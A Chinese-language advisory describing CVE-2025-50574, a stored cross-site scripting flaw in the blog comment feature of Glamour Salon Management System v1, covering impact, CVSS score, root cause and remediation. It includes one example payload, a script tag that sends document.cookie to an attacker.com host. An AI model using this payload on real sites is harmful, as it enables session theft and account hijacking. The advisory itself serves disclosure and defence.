CVE-2025-50574CVE-2025-50574是Hiruna Gallage开发的Glamour Salon Management System v1中存在的存储型跨站脚本(Stored XSS)漏洞。该漏洞位于blog-details.php文件中的博客评论功能模块,攻击者可以通过评论部分参数注入任意Web脚本或HTML代码。由于该漏洞为存储型XSS,恶意脚本会被永久保存在服务器端,所有访问该博客页面的用户都会受到攻击影响。攻击者可以利用此漏洞窃取用户会话Cookie、劫持用户账户、进行钓鱼攻击或植入恶意重定向,对系统用户造成严重安全威胁。此漏洞无需认证即可利用,但需要用户交互才能触发,因此CVSS评分为6.1,属于中等严重程度。攻击向量为网络,复杂度低,无需特殊权限,但需要受害者访问包含恶意脚本的页面才能完成攻击。
该漏洞本质上是典型的存储型XSS(Stored Cross-Site Scripting)漏洞。在Glamour Salon Management System的blog-details.php文件中,博客评论功能未对用户输入进行充分的输入验证和输出编码。当用户提交包含恶意JavaScript代码的评论时,系统直接将该内容存储到数据库中而未进行安全过滤。随后,当其他用户访问该博客详情页面时,服务器从数据库中检索并展示评论内容,如果评论中包含恶意脚本,这些脚本会在受害者的浏览器中执行。攻击者可以利用此漏洞注入窃取Cookie的JavaScript代码,如:<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>。由于浏览器同源策略的限制,攻击者通常无法直接获取HttpOnly标记的Cookie,但可以利用XSS漏洞进行其他恶意操作,如键盘记录、页面篡改或发起进一步的攻击。修复此类漏洞需要对所有用户输入进行严格的输入验证,并使用HTML实体编码或使用现代前端框架的安全机制进行输出编码。